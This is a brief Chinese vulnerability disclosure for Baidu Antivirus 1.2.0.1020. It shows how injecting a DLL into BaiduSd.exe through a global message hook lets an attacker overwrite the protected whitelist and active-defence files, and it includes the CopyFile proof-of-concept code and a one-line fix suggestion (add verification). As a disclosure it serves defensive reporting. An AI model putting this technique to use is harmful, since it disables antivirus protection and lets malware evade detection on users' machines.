测试版本:百度
杀毒1.2.0.1020
和腾讯一样的,只是百度2个文件都保护了.
//这个文件是杀毒白名单,免杀就往这加
C:\Documents and Settings\All Users\Application Data\baidu\baidusd\white_list.db
//这个是主动防御
C:\Documents and Settings\All Users\Application Data\baidu\baidusd\Config\900.dat
虽然都保护了但有个地方百度疏忽了,见POC
1.先本地构造好white_list.db和900.dat放到C盘
2.编写一个简单的全局消息注入程序,将test.dll注入到BaiduSd.exe绕过保护修改文件
以下为test.dll核心代码
CopyFile(_T(“C:\\white_list.db”),_T(“C:\\Documents and Settings\\All Users\\Application Data\\baidu\\baidusd\\white_list.db”),FALSE);
CopyFile(_T(“C:\\900.dat”),_T(“C:\\Documents and Settings\\All Users\\Application Data\\baidu\\baidusd\\Config\\900.dat”),FALSE);
修复方案:
校验啊校验
